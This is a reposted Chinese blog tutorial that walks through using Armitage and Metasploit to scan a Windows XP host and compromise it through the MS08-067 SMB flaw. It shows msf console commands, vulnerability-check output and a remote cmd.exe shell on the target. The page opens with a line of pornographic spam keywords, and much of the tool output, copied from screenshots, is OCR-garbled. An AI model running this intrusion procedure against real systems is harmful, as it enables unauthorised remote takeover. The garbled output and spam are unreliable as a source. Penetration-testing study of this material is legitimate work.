小男孩‘自慰网亚洲一区二区,亚洲一级在线播放毛片,亚洲中文字幕av每天更新,黄aⅴ永久免费无码,91成人午夜在线精品,色网站免费在线观看,亚洲欧洲wwwww在线观看

分享

強(qiáng)大的漏洞測(cè)試工具Armitage(Metasploit下)

 昵稱597197 2015-01-14
Armitage是一款Java寫的Metasploit圖形界面化的攻擊軟件,可以用它結(jié)合 Metasploit中已知的exploit來(lái)針對(duì)主機(jī)存在的漏洞自動(dòng)化攻擊。
在Backtrack5中已經(jīng)默認(rèn)存在了。首先我們更新一下Metasploit,啟動(dòng)一個(gè)終端: root@bt:?# Cd /pentest/exploits/framework3
root@bt: /pentest/exploits/framework3# ./msfupdateV
等待數(shù)分鐘的更新,完畢以后,啟動(dòng)一個(gè)MSF的GUI,圖1:
圖1
點(diǎn)擊左下角的“start new msfpcd” 按鈕啟動(dòng)msfrpcd服務(wù),需要等待它加載模塊, 加載模塊時(shí)右下角有滾動(dòng)條的滾動(dòng),等待加載完畢后。

然后啟動(dòng)Armitage,它在Backtrack5中位于菜單 “BackTrack->Exploitation Tools->Network Exploitation Tools->Metasploit Framework” 中,啟動(dòng)它將彈出一個(gè)如圖3的連接窗口:
圖3
使用Armitage需要連接到msfpcd服務(wù)中,需要知道啟動(dòng)服務(wù)時(shí)設(shè)定的端口、賬號(hào)和密碼,這些信息可以在剛才啟動(dòng)的msfgui中查看,點(diǎn)擊msfgui的“file”菜單的“show connection details”,在彈出的對(duì)話框中就可以看到用戶名、密碼和端口等信息了,如圖:
RPC connection type: XML username: msf password: zdcnjivKnt host: 127.0.0.1 port: 55553 ssl: false
圖4
在本例中,用戶名為msf,密碼為隨機(jī)密碼zdcnjivxnt,端口為55553,當(dāng)然這些可以在啟動(dòng)msfgui的時(shí)候更改,在圖1所示的界面中就可以更改。這里主要關(guān)注用戶名、密碼和端口,將這些對(duì)應(yīng)填寫到啟動(dòng)armitage所示的界面中,然后點(diǎn)擊“connect”按鈕。 如果填寫無(wú)誤,則很快就彈出了armitage的主界面了,如圖5:
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
wake up, Neo.., the matrix has you follow the white rabbit,
圖5
如果一直在圖6中所示的窗口中等待,說(shuō)明設(shè)置有問(wèn)題,請(qǐng)檢查設(shè)置,特別是賬號(hào)和密碼:

Progress..
Connecting to 127.0.0.1:55553 java.io.lOException: authentication error
Cancel
現(xiàn)在,我們就要對(duì)主機(jī)進(jìn)行攻擊了,我的攻擊目標(biāo)是192.168.1.105的一臺(tái)英文版的 Windows XP sp3系統(tǒng)。
首先對(duì)目標(biāo)機(jī)進(jìn)行掃描,armitage中集成了nmap,點(diǎn)擊armitage的“Hosts”菜單,選擇”Nmap Scanw“,彈出的子菜單中有很多掃描選項(xiàng),我直接用”QuickScan (0Sdetect)w, 這種快速掃描可以自動(dòng)探測(cè)目標(biāo)主機(jī)的操作系統(tǒng),在armitage攻擊系統(tǒng)時(shí),準(zhǔn)確探測(cè)出操作系統(tǒng)是比較重要的。最后彈出圖7所示的正輸入框:
圖7
由于我是對(duì)一臺(tái)主機(jī)進(jìn)行掃描,故此只用填目標(biāo)正地址即可。也可以支持一個(gè)網(wǎng)段的掃描, 格式為輸入框上方的提示:IP/網(wǎng)絡(luò)位數(shù)。點(diǎn)擊“0K”按鈕即進(jìn)行掃描。這個(gè)時(shí)候可以在Armitage下方看到掃描進(jìn)度,如圖8:
PORT STATt SCRVICE VCRSI0N
135/tcp opcn mpc fUcrovol 1 Windowv WK
139/ttp opcn ncUiov>svn
44*i/trp oprn ^cro^oft-d^ Nirro^ofT Windows XV ^crosoft-ds NAC Address: 00:00:27t8%:65:AS (CidHJS CMputer SystCK) Dcvicc ijfpe: 9cn"4l purpovc Kunninqi Rirrosoft windo?s XH os details: Nicroseft Windows XP SP2 or SP3
掃描完成后彈出圖
Use Attacks->Find Attacks to suggest applicable exploits for your targets.
OK
接著開(kāi)始掃描漏洞,選擇armitage菜單上的“Attacks’
“by port",如圖 10:
圖10
選擇“by port”意味著根據(jù)掃描到主機(jī)開(kāi)放的端口,列出所有可以針對(duì)端口所對(duì)應(yīng)服務(wù)攻擊的已知漏洞列表。這里讀者要注意,點(diǎn)擊以后armitage界面將看不到任何變動(dòng),千萬(wàn)不要誤認(rèn)為是armitage沒(méi)有響應(yīng)你的點(diǎn)擊,只需要耐心等待一會(huì)兒,就可以看到圖11所示的提示了:
Message
Attack Analysis Complete...
You will now see an 'Attack' menu attached to each host in the Targets window.
Happy hunting!
OK
至此掃描完成了,現(xiàn)在對(duì)目標(biāo)主機(jī)點(diǎn)右鍵,就可以看到有個(gè)“attack”菜單了,子菜單中列出了所有可以針對(duì)目標(biāo)機(jī)開(kāi)放端口對(duì)應(yīng)服務(wù)的exploit。
這里我選擇"smb",然后彈出子菜單,可以看到菜單中有針對(duì)ms08-067、ms10-061等等的exp,這里列出的是所有已知的針對(duì)該服務(wù)的奴口10^,而不是說(shuō)主機(jī)就一定存在這些漏洞, 主機(jī)具體存在什么漏洞,還需要我們?nèi)z測(cè),直接點(diǎn)擊“check exploit”,armitage就可以自動(dòng)檢測(cè)哪些漏洞是存在的。點(diǎn)擊以后,armitage將針對(duì)這些exploit逐個(gè)進(jìn)行檢測(cè), 此時(shí)要注意 Armitage 下方的檢測(cè)結(jié)果,“ [*] This exploit does not support check” 說(shuō)明漏洞不存在,圖13中,檢測(cè)到主機(jī)存在ms08-067,:  

===== Checking windows/smb/ms08_067_netapi ===== use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.105
RHOST => 192.168.1.105
msf exploit(ms08_067_netapi) > check
r*l Wprifv,i nn unlnpr^hlp ctAt|iS . . . (path: 0x0000005a)
[+] The target is vulnerable.
===== Checking windows/smb/mslO_061_spoolss : msf eiploit(timbuktu_plughntconmandbof) > |
這時(shí),我們?cè)僭谀繕?biāo)主機(jī)上點(diǎn)右鍵,選擇“Attack-smb-ms08_067_netapi",將
彈出圖14的exploit配置窗口,直接默認(rèn),A“Launch”。
Microsoft Server Service Relative Path Stack Corruption
This module exploits a parsing flaw in the path canonicalcation code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP farnpfs <^ppm tn hanrilp mnltinlp surrp<isfijl PKnloitation pvpnts. hut 700^ tarnpts will
[Console X nmap X Check Exploits X cmcJ.exe 1332@1 X |  
C:\WIND0WS\system32> ipconfig  
Windows IP Configuration  
Ethernet adapter Local Area Connection  
Connection-specific DNS Suffix IP Address. ......... Subnet Hask ......... Default Gateway ....... .! 192.168.1.105 .:255.255.255.0 ,:192.168.1.1 
C:\WIND0WS\system32> |_  
我們已經(jīng)成功將一臺(tái)存在ms08-067的機(jī)器淪為肉雞了。Armitage的全自動(dòng)化非常有助 于管理員對(duì)主機(jī)的漏洞測(cè)試,但希望用于合法用途:)。

    本站是提供個(gè)人知識(shí)管理的網(wǎng)絡(luò)存儲(chǔ)空間,所有內(nèi)容均由用戶發(fā)布,不代表本站觀點(diǎn)。請(qǐng)注意甄別內(nèi)容中的聯(lián)系方式、誘導(dǎo)購(gòu)買等信息,謹(jǐn)防詐騙。如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請(qǐng)點(diǎn)擊一鍵舉報(bào)。
    轉(zhuǎn)藏 分享 獻(xiàn)花(0

    0條評(píng)論

    發(fā)表

    請(qǐng)遵守用戶 評(píng)論公約

    類似文章 更多